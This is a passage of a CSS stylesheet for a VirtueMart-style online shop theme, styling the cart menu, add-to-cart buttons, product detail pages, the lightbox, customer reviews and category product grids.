  -ms-transform: translateX(260px);
  -o-transform: translateX(260px);
  transform: translateX(260px);
}
#cd-lateral-nav .cd-navigation h5 {
  color: #000000;
}
#cd-lateral-nav.shopping-menu-is-open {
  -webkit-transform: translateX(0);
  -moz-transform: translateX(0);
  -ms-transform: translateX(0);
  -o-transform: translateX(0);
  transform: translateX(0);
  visibility: visible;
  -webkit-transition: -webkit-transform .4s 0s, visibility 0s 0s;
  -moz-transition: -moz-transform .4s 0s, visibility 0s 0s;
  transition: transform .4s 0s, visibility 0s 0s;
  -webkit-overflow-scrolling: touch;
}
img,
svg {
  max-width: 100%;
}
button {
  -webkit-appearance: none;
  -moz-appearance: none;
  -ms-appearance: none;
  -o-appearance: none;
  appearance: none;
  cursor: pointer;
  border: none;
  padding: 0;
}
button:focus {
  outline: none;
}
#form-login input.button {
  padding: 4px 32px 5px;
}
.product_row hr,
.cd-single-item hr {
  width: 100%;
  display: block;
  margin: 20px auto 0;
}
.cd-single-item {
  position: relative;
  display: block;
}
.product_name > a {
  display: block;
}
.cart-image {
  width: 35%;
  display: block;
}
.cart-image.pull-left {
  margin: 0 10px 20px 0;
}
.quantity {
  position: relative;
  top: 10px;
  left: -3px;
  height: 20px;
  width: 20px;
  line-height: 20px;
  color: #ffffff;
  font-size: 11px;
  font-weight: bold;
  text-align: center;
  border-radius: 50%;
  -webkit-transition: -webkit-transform 0.2s 0s;
  -moz-transition: -moz-transform 0.2s 0s;
  transition: transform 0.2s 0s;
}
.cart-item {
  width: 60%;
  display: inline-table;
}
.cart-item span {
  line-height: 22px;
}
.cd-single-item >a {
  display: block;
  background-color: #ffffff;
  box-shadow: 0 2px 10px rgba(0,0,0,0.08);
  border-radius: 4px;
}
.no-touch .cd-single-item:hover .cd-customization-trigger,
.cd-single-item.hover .cd-customization-trigger {
  display: none;
}
.cd-customization .add-to-cart {
  display: block;
  float: left;
  width: 140px;
  height: 40px;
  margin: 0 auto;
  padding: 0;
  border: 0;
  outline: 0;
  border-radius: 3px;
  position: relative;
  overflow: hidden;
  font-size: 95%;
  font-weight: 600;
  text-transform: uppercase;
  color: #ffffff;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  box-shadow: inset 0 -1px 0 1px rgba(0,0,0,0.05), inset 0 0 1px rgba(0,0,0,0.05);
  text-shadow: 0 1px 2px rgba(0,0,0,0.2);
}
.cd-customization .add-to-cart input[name="addtocart"] {
  background: transparent;
  border: none;
  outline: none;
  line-height: 40px;
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  -webkit-transform: translateZ(0);
  -moz-transform: translateZ(0);
  -ms-transform: translateZ(0);
  -o-transform: translateZ(0);
  transform: translateZ(0);
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
  -webkit-transition: -webkit-transform 0.3s;
  -moz-transition: -moz-transform 0.3s;
  transition: transform 0.3s;
}
.cd-customization .add-to-cart svg {
  position: absolute;
  left: 50%;
  top: 50%;
  width: 100%;
  -webkit-transform: translateX(50%) translateY(-50%);
  -moz-transform: translateX(50%) translateY(-50%);
  -ms-transform: translateX(50%) translateY(-50%);
  -o-transform: translateX(50%) translateY(-50%);
  transform: translateX(50%) translateY(-50%);
  -webkit-transition: -webkit-transform 0.3s;
  -moz-transition: -moz-transform 0.3s;
  transition: transform 0.3s;
}
.total {
  text-align: center;
  margin-top: 30px;
}
.show_cart {
  text-align: center;
  margin: 20px auto 25px;
}
.show_cart a {
  color: #fff !important;
  display: block;
  width: 100%;
  height: 100%;
  border-radius: 3px;
  border-color: #f03f29;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
}
.show_cart a >i {
  margin-right: 10px;
  margin-left: -5px;
}
.show_cart a:hover,
.show_cart a:focus {
  border-color: #ca230e;
  background-color: #f03720;
  color: #fff;
}
.vmLoadingDiv,
#fancybox-loading {
  display: none;
  position: fixed;
  z-index: 1100;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
  height: 100%;
  width: 100%;
  background: rgba(255,255,255,0.35) url(../images/vm-loader.svg) 50% 50% no-repeat;
}
.productdetails-view .vm-product-media-img {
  margin: 0 -1px;
}
.productdetails-view .vm-product-media-img .main-image {
  padding: 0;
  margin: 0;
}
.productdetails-view .vm-product-media-img .main-image img {
  width: 100%;
  max-height: inherit;
}
.productdetails-view .vm-product-media-img .main-image span.vm-img-desc {
  display: block;
  padding: 10px 7px;
  line-height: 1.3;
  font-size: 85%;
  color: #555;
  text-align: center;
}
.productdetails-view .vm-product-media-img .additional-images {
  margin: 20px auto;
  padding: 0;
}
.productdetails-view .vm-product-media-img .additional-images div.cols {
  display: inline-table;
  float: left;
  text-align: center;
  padding: 0;
  margin: 0 auto;
  margin-bottom: 10px !important;
}
.productdetails-view .vm-product-media-img .additional-images div.cols.cols-1,
.productdetails-view .vm-product-media-img .additional-images div.cols.cols-2 {
  width: 46%;
  margin: 0 1.7% 4.5%;
}
.productdetails-view .vm-product-media-img .additional-images div.cols.cols-3 {
  width: 30%;
  margin: 0 1.4% 3.3%;
}
.productdetails-view .vm-product-media-img .additional-images div.cols.cols-4 {
  width: 22.5%;
  margin: 0 1% 3%;
}
.productdetails-view .vm-product-media-img .additional-images div.cols:last-child {
  margin-right: 0;
}
.productdetails-view .vm-product-media-img .additional-images div.cols span.vm-img-desc {
  display: block;
  padding: 10px 7px;
  line-height: 1.3;
  font-size: 80%;
  color: #555;
  text-align: center;
}
.productdetails-view .vm-product-media-img .additional-images img {
  width: 100%;
  height: 100%;
}
.productdetails-view .vm-product-details-inner .vm-product-title h2 {
  font-size: 26px;
  line-height: 1.2;
  font-weight: 500;
  float: left;
  margin: 0;
}
.productdetails-view .vm-product-details-inner .vm-product-shipments {
  display: none;
}
.productdetails-view .vm-product-details-inner .product-price {
  text-align: left;
  margin: 0 auto 10px;
  padding: 0;
  display: block;
  height: auto;
  width: 100%;
  clear: both;
}
.productdetails-view .vm-product-details-inner .product-price >div {
  font-size: 13px;
}
.productdetails-view .vm-product-details-inner .product-price >div >span + span {
  font-size: 15px;
}
.productdetails-view .vm-product-details-inner .product-price .PricesalesPrice .vm-price-desc,
.productdetails-view .vm-product-details-inner .product-price .PricesalesPriceTt .vm-price-desc {
  font-size: 18px;
}
.productdetails-view .vm-product-details-inner .product-price .PricesalesPrice span.PricesalesPrice,
.productdetails-view .vm-product-details-inner .product-price .PricesalesPrice span.PricesalesPriceTt,
.productdetails-view .vm-product-details-inner .product-price .PricesalesPriceTt span.PricesalesPrice,
.productdetails-view .vm-product-details-inner .product-price .PricesalesPriceTt span.PricesalesPriceTt {
  font-weight: 600;
  font-size: 25px;
}
.productdetails-view .vm-product-details-inner .product-price *,
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc {
  line-height: 1.3;
}
.productdetails-view .vm-product-details-inner .PricebasePrice > span.PricebasePrice {
  font-size: 17px;
}
.productdetails-view .vm-product-details-inner .percent-off {
  margin: 10px 0 0 0;
  background: rgba(241,72,51,0.75);
  padding: 5px 8px;
  border-radius: 3px;
  width: auto;
  color: #fff;
  font-size: 15px;
  font-weight: 600;
  text-transform: uppercase;
  box-shadow: 0 2px 0 rgba(0,0,0,0.1);
  display: table;
  text-shadow: 1px 1px 2px rgba(0,0,0,0.2);
}
.productdetails-view .vm-product-details-inner .percent-off:before {
  content: "";
  position: absolute;
  width: 5px;
  height: 5px;
  margin-top: 21px;
  margin-left: 1px;
  border-top: 3px solid rgba(241,72,51,0.7);
  border-bottom: 3px solid transparent;
  border-left: 5px solid rgba(241,72,51,0.7);
  border-right: 5px solid transparent;
}
.productdetails-view .vm-product-details-inner .percent-off > span {
  margin-left: 5px;
}
.productdetails-view .vm-product-details-inner .price-without-discount {
  margin-bottom: 8px;
}
.productdetails-view .vm-product-details-inner .price-without-discount .PricebasePrice > span.PricebasePrice {
  text-decoration: line-through;
}
.productdetails-view .vm-product-details-inner .PricediscountAmount {
  margin-top: 8px;
}
.productdetails-view .vm-product-details-inner .PricediscountAmount > span.PricediscountAmount {
  color: #f14833;
}
.productdetails-view .vm-product-details-inner .product-short-description {
  clear: both;
  margin-bottom: 30px;
  overflow: hidden;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  font-size: 90%;
  margin: 5px 5px 0 0;
}
.productdetails-view .vm-product-details-inner span.product-manufacturer .manufacturer {
  display: inline-block;
  margin: 0 7px;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area {
  padding: 0;
  display: block;
  width: 100%;
  clear: both;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .availability > img {
  padding: 8px 20px 0;
  max-width: 160px;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar {
  padding: 0;
  margin: 0;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate {
  display: inline-table;
  float: left;
  margin: 4px 20px 0 0;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate >label.quantity_box {
  color: #aaa;
  margin-right: 5px;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls {
  background-image: none;
  margin: 0;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  display: block;
  position: absolute;
  z-index: 2;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-plus {
  width: 20px;
  height: 16px;
  margin: -16px 0 0 0;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa {
  color: #999;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far {
  color: #999;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  width: 20px;
  height: 16px;
  margin: 0 0 0 0;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa {
  color: #999;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far {
  color: #999;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fa,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fas,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .far {
  position: absolute;
  z-index: 1;
  font-size: 9px;
  line-height: 12px;
  color: #bbb;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up {
  margin: -13px 0 0 5px;
}
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.productdetails-view .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down {
  margin: 0 0 0 5px;
}
.productdetails-view .vm-product-details-inner div.ask-a-question {
  margin: 25px auto 10px;
  float: left;
  display: block;
  clear: both;
  padding: 0;
  border: 0;
}
.productdetails-view .vm-product-details-inner div.ask-a-question a.ask-a-question {
  background: none;
  color: #aaa;
  border: 0;
  padding: 5px 0;
}
.productdetails-view .vm-product-details-inner div.ask-a-question a.ask-a-question i {
  margin-right: 7px;
}
.productdetails-view .vm-product-details-inner div.ask-a-question a.ask-a-question:hover {
  color: #707070;
}
.productdetails-view .vm-product-details-inner .back-to-category {
  margin: 25px auto 10px;
  display: inline-table;
}
.productdetails-view .vm-product-details-inner .back-to-category a {
  background: none;
  border-radius: 0;
  padding: 5px;
  border: 0;
}
.productdetails-view .vm-product-details-inner .back-to-category a i {
  margin-right: 7px;
}
.productdetails-view .vm-product-details-inner .back-to-category + hr {
  display: block;
  clear: both;
}
.productdetails-view .vm-product-details-inner .product-neighbours {
  margin: 30px auto 0;
  position: relative;
  display: block;
  clear: both;
  width: 182px;
  text-align: center;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page {
  overflow: hidden;
  display: inline-block;
  width: 90px;
  height: 40px;
  line-height: 40px;
  margin: 0 auto;
  background-image: none;
  padding: 0;
  text-indent: -9999em;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
  line-height: 40px;
  font-size: 18px;
  padding: 0 17px;
  width: 90px;
  color: #fff;
  text-align: center;
  float: left;
  text-indent: 0;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #f14833;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before {
  content: "\f053";
  border-radius: 4px 0 0 4px;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  content: "\f054";
  border-radius: 0 4px 4px 0;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  width: 48%;
  height: 40px;
  line-height: 40px;
  margin: 0 auto;
  background: #fff url(../images/empty.svg) center center repeat;
  font-size: 20px;
  padding: 0;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page {
  border-radius: 4px 0 0 4px;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  border-radius: 0 4px 4px 0;
}
.productdetails-view .icons {
  margin: 15px 0 0 15px;
  display: block;
  float: right;
  right: 3%;
  position: absolute;
}
.productdetails-view .icons a {
  float: left;
  display: inline-table;
  text-align: center;
  color: #aaa;
  font-weight: normal;
  line-height: 22px;
  font-size: 13px;
  width: 27px;
  margin-right: 3px;
  border-radius: 2px;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.productdetails-view .icons a >img {
  display: none;
}
.productdetails-view .icons a.printModal:before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
  content: "\f02f";
}
.productdetails-view .icons a.recommened-to-friend:before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 400;
  content: "\f0e0";
}
.productdetails-view .icons span.pdf-icon >a:before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 400;
  content: "\f1c1";
}
.productdetails-view .products-desc-tab {
  margin-bottom: 30px;
}
.productdetails-view .products-desc-tab .nav-tabs >li >a {
  text-transform: uppercase;
  background: #f8f8f8;
  border: 0;
  border: 1px solid #e2e2e2;
  border-bottom: 1px solid #e2e2e2;
  margin: 0 7px 0 0;
  padding: 15px 35px;
}
.productdetails-view .products-desc-tab .nav-tabs >li >a >i {
  margin: -1px 10px 0 0;
  font-size: 125%;
  vertical-align: top;
  font-weight: 500;
}
.productdetails-view .products-desc-tab .tab-content {
  border-left: 1px solid #e2e2e2;
  border-right: 1px solid #e2e2e2;
  border-bottom: 1px solid #e2e2e2;
  padding: 30px;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane {
  display: block;
  box-sizing: border-box;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane .rating_wrap {
  margin: 20px auto;
  padding: 12px 10px 8px;
  background: #eee url(../images/cd-lateral-nav.svg) center center repeat;
  box-shadow: 0 0 0px 1px #f7f7f7;
  border-radius: 3px;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane .rating {
  margin: 10px auto 0;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane .rating .ratingbox {
  display: block;
  background-size: 16px;
  height: 16px;
  width: 80px;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane .rating .ratingbox .stars-orange {
  background-size: 16px;
  height: 16px;
  width: 80px;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane .rating .ratingbox span {
  float: left;
  box-sizing: border-box;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane.desc div {
  display: none;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane.review {
  visibility: hidden;
  height: 0px;
  overflow: hidden;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane.desc.active div {
  display: block;
}
.productdetails-view .products-desc-tab .tab-content .tab-pane.review.active {
  visibility: visible;
  height: auto;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews {
  padding: 0;
  margin: 0;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews h4 {
  display: block;
  font-size: 135%;
  padding: 0 5% 15px 0;
  margin: 0;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews {
  margin: 20px auto;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews .normal {
  border: none;
  padding: 0;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date {
  border: none;
  display: inline-block;
  border: 1px solid #eee;
  border-radius: 3px;
  float: left;
  line-height: 30px;
  padding: 0 10px;
  margin: 6px 25px 0 0;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  font-weight: 800;
  font-size: 110%;
  line-height: 1.7;
  margin-right: 5px;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.vote {
  float: none;
  margin: 5px 0 15px;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.vote .ratingbox {
  background-size: 16px;
  height: 16px;
  width: 16px;
  width: 80px;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.vote .ratingbox .stars-orange {
  background-size: 16px;
  height: 16px;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews blockquote {
  border-color: #f2f4f7;
  clear: both;
  padding: 0 20px;
  font-size: 90%;
  margin-top: 12px;
  word-wrap: break-word;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews blockquote:before {
  content: open-quote;
  vertical-align: middle;
  line-height: 10px;
  font-weight: 700;
  font-size: 32px;
  padding-right: 6px;
  color: #aaa;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews blockquote:after {
  content: close-quote;
  vertical-align: middle;
  line-height: 10px;
  font-weight: 700;
  font-size: 32px;
  padding-left: 6px;
  color: #aaa;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews .bold {
  padding-left: 25px;
  font-weight: 500;
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .write-reviews {
  text-align: left;
  margin: 20px 0;
}
.empty_cart {
  text-align: center;
}
.empty_cart >h3 {
  color: #999;
}
.empty_cart >i.pe {
  font-size: 77px;
  color: #ccc;
  margin: 15px auto;
}
.empty_cart >i.pe >span {
  display: block;
  text-align: center;
  font-size: 27%;
  margin: -62px 0 0 32px;
  width: 25px;
  height: 25px;
  line-height: 25px;
  position: absolute;
  border-radius: 24px;
}
.vm-pagination-bottom {
  text-align: center;
}
.vm-pagination-bottom .vm-page-counter {
  display: block;
  width: 100%;
  text-align: center;
}
.vm-rating {
  width: 100%;
  display: block;
  clear: both;
  margin-bottom: 25px;
}
.vm-rating .product-in-stock {
  display: inline-table;
  margin-right: 15px;
  color: #777;
  font-size: 95%;
}
.vm-rating .product-in-stock >i {
  color: green;
  font-size: 110%;
  font-weight: 600;
  vertical-align: top;
  line-height: 1.623;
}
.vm-rating .product-in-stock >i.pe-7s-less {
  color: red;
}
.vm-rating .ratingbox {
  background-size: 13px;
  width: 65px;
  margin: 0;
}
.vm-rating .ratingbox .stars-orange {
  background-size: 13px;
  max-width: 65px !important;
  margin-top: 12px;
}
#fancybox-outer {
  left: 0;
  top: 0;
  right: 0;
  bottom: 0;
  background: #fff;
  overflow: visible;
  box-shadow: 0 0 22px rgba(0,0,0,0.25);
  border-radius: 4px;
}
#fancybox-close {
  width: 32px;
  height: 32px;
  background: transparent;
}
#fancybox-close:before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
  color: #fff;
  position: relative;
  font-size: 15px;
  line-height: 32px;
  display: inline-block;
  content: "\f00d";
  margin: 0 auto;
  width: 32px;
  height: 32px;
  text-align: center;
  background: rgba(0,0,0,0.5);
  border-radius: 3px;
}
#fancybox-loading div {
  display: none;
}
.fancybox-bg {
  width: 0px;
  height: 0px;
  left: 0;
  top: 0;
}
#fancybox-bg-n,
#fancybox-bg-ne,
#fancybox-bg-e,
#fancybox-bg-se,
#fancybox-bg-s,
#fancybox-bg-sw,
#fancybox-bg-w,
#fancybox-bg-nw {
  background-image: none;
  left: 0;
  top: 0;
  right: 0;
  bottom: 0;
  width: 0px;
  height: 0px;
  padding: 0;
  margin: 0;
  border: 0;
}
#fancybox-overlay {
  background: #fff !important;
}
#fancybox-wrap {
  overflow: visible !important;
  text-align: center;
  padding: 0 !important;
  margin: 0 !important;
  border: 0 !important;
}
#fancybox-wrap #fancybox-left-ico,
#fancybox-wrap #fancybox-right-ico {
  background: transparent;
}
#fancybox-wrap #fancybox-left-ico:before,
#fancybox-wrap #fancybox-right-ico:before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
  position: absolute;
  color: #fff;
  font-size: 22px;
  line-height: 44px;
  width: 44px;
  height: 44px;
  text-align: center;
  background: rgba(0,0,0,0.5);
  border-radius: 3px;
}
#fancybox-wrap #fancybox-left-ico:before {
  position: absolute;
  left: -45px;
  content: "\f053";
}
#fancybox-wrap #fancybox-right-ico:before {
  right: -46px;
  content: "\f054";
}
#fancybox-wrap #fancybox-title {
  width: 99% !important;
  position: relative;
  margin: 0 auto;
  background: transparent;
}
#fancybox-wrap #fancybox-content {
  padding: 20px 20px 30px;
  border: none !important;
  min-height: 70%;
  min-width: 70%;
  display: block;
  text-align: center;
  margin: 0 auto;
}
#fancybox-wrap #fancybox-content h4 {
  display: block;
  font-size: 16px;
  line-height: 22px;
  margin: 20px auto;
}
.category-view .browse-view h1,
.browse-view .browse-view h1,
.latest-view .browse-view h1,
.recent-view .browse-view h1,
.featured-view .browse-view h1,
.topten-view .browse-view h1 {
  margin: 0 auto;
}
.category-view h4,
.browse-view h4,
.latest-view h4,
.recent-view h4,
.featured-view h4,
.topten-view h4 {
  line-height: 1.5;
  display: table;
  margin: 35px 0 30px;
  font-size: 160%;
  padding-right: 5%;
  box-shadow: inset 0 -1px 0 rgba(90,90,90,0.15);
}
.category-view h4 .divider,
.browse-view h4 .divider,
.latest-view h4 .divider,
.recent-view h4 .divider,
.featured-view h4 .divider,
.topten-view h4 .divider {
  clear: both;
  float: left;
  height: 10px;
  width: 75%;
  border-bottom: 2px solid #f14833;
}
.category-view .row.productwrap,
.browse-view .row.productwrap,
.latest-view .row.productwrap,
.recent-view .row.productwrap,
.featured-view .row.productwrap,
.topten-view .row.productwrap {
  list-style: none;
  padding: 0;
  margin: 0 -15px;
}
.category-view .row.productwrap .product,
.category-view .row.productwrap .products,
.browse-view .row.productwrap .product,
.browse-view .row.productwrap .products,
.latest-view .row.productwrap .product,
.latest-view .row.productwrap .products,
.recent-view .row.productwrap .product,
.recent-view .row.productwrap .products,
.featured-view .row.productwrap .product,
.featured-view .row.productwrap .products,
.topten-view .row.productwrap .product,
.topten-view .row.productwrap .products {
  border: none;
  margin: 0 -1px 20px 0;
}
.category-view .row.productwrap .product .spacer,
.category-view .row.productwrap .products .spacer,
.browse-view .row.productwrap .product .spacer,
.browse-view .row.productwrap .products .spacer,
.latest-view .row.productwrap .product .spacer,
.latest-view .row.productwrap .products .spacer,
.recent-view .row.productwrap .product .spacer,
.recent-view .row.productwrap .products .spacer,
.featured-view .row.productwrap .product .spacer,
.featured-view .row.productwrap .products .spacer,
.topten-view .row.productwrap .product .spacer,
.topten-view .row.productwrap .products .spacer {
  padding: 0;
  margin: 0;
}
.category-view .row.productwrap .product .spacer .spacer-inner .product-in-stock,
.category-view .row.productwrap .products .spacer .spacer-inner .product-in-stock,
.browse-view .row.productwrap .product .spacer .spacer-inner .product-in-stock,
.browse-view .row.productwrap .products .spacer .spacer-inner .product-in-stock,
.latest-view .row.productwrap .product .spacer .spacer-inner .product-in-stock,
.latest-view .row.productwrap .products .spacer .spacer-inner .product-in-stock,
.recent-view .row.productwrap .product .spacer .spacer-inner .product-in-stock,
.recent-view .row.productwrap .products .spacer .spacer-inner .product-in-stock,
.featured-view .row.productwrap .product .spacer .spacer-inner .product-in-stock,
.featured-view .row.productwrap .products .spacer .spacer-inner .product-in-stock,
.topten-view .row.productwrap .product .spacer .spacer-inner .product-in-stock,
.topten-view .row.productwrap .products .spacer .spacer-inner .product-in-stock {
  margin: 0 auto 12px;
  color: #777;
}
.category-view .row.productwrap .product .spacer .spacer-inner .product-in-stock span.stock,
.category-view .row.productwrap .products .spacer .spacer-inner .product-in-stock span.stock,
.browse-view .row.productwrap .product .spacer .spacer-inner .product-in-stock span.stock,
.browse-view .row.productwrap .products .spacer .spacer-inner .product-in-stock span.stock,
.latest-view .row.productwrap .product .spacer .spacer-inner .product-in-stock span.stock,
.latest-view .row.productwrap .products .spacer .spacer-inner .product-in-stock span.stock,
.recent-view .row.productwrap .product .spacer .spacer-inner .product-in-stock span.stock,
.recent-view .row.productwrap .products .spacer .spacer-inner .product-in-stock span.stock,
.featured-view .row.productwrap .product .spacer .spacer-inner .product-in-stock span.stock,
.featured-view .row.productwrap .products .spacer .spacer-inner .product-in-stock span.stock,
.topten-view .row.productwrap .product .spacer .spacer-inner .product-in-stock span.stock,
.topten-view .row.productwrap .products .spacer .spacer-inner .product-in-stock span.stock {
  font-size: 90%;
}
.category-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe,
.category-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe,
.browse-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe,
.browse-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe,
.latest-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe,
.latest-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe,
.recent-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe,
.recent-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe,
.featured-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe,
.featured-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe,
.topten-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe,
.topten-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe {
  color: green;
  font-size: 110%;
  font-weight: 600;
  vertical-align: top;
  line-height: 1.623;
}
.category-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.category-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.browse-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.browse-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.latest-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.latest-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.recent-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.recent-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.featured-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.featured-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.topten-view .row.productwrap .product .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less,
.topten-view .row.productwrap .products .spacer .spacer-inner .product-in-stock i.pe.pe-7s-less {
  color: red;
}
.category-view .row.productwrap .product .spacer .spacer-inner .availability > img,
.category-view .row.productwrap .products .spacer .spacer-inner .availability > img,
.browse-view .row.productwrap .product .spacer .spacer-inner .availability > img,
.browse-view .row.productwrap .products .spacer .spacer-inner .availability > img,
.latest-view .row.productwrap .product .spacer .spacer-inner .availability > img,
.latest-view .row.productwrap .products .spacer .spacer-inner .availability > img,
.recent-view .row.productwrap .product .spacer .spacer-inner .availability > img,
.recent-view .row.productwrap .products .spacer .spacer-inner .availability > img,
.featured-view .row.productwrap .product .spacer .spacer-inner .availability > img,
.featured-view .row.productwrap .products .spacer .spacer-inner .availability > img,
.topten-view .row.productwrap .product .spacer .spacer-inner .availability > img,
.topten-view .row.productwrap .products .spacer .spacer-inner .availability > img {
  max-width: 160px;
  -webkit-transform: scale(1);
  transform: scale(1);
}
.category-view .row .spacer,
.browse-view .row .spacer,
.latest-view .row .spacer,
.recent-view .row .spacer,
.featured-view .row .spacer,
.topten-view .row .spacer {
  border: 1px solid rgba(0,0,0,0.1);
  border-radius: 4px;
  padding: 0;
  margin: 0;
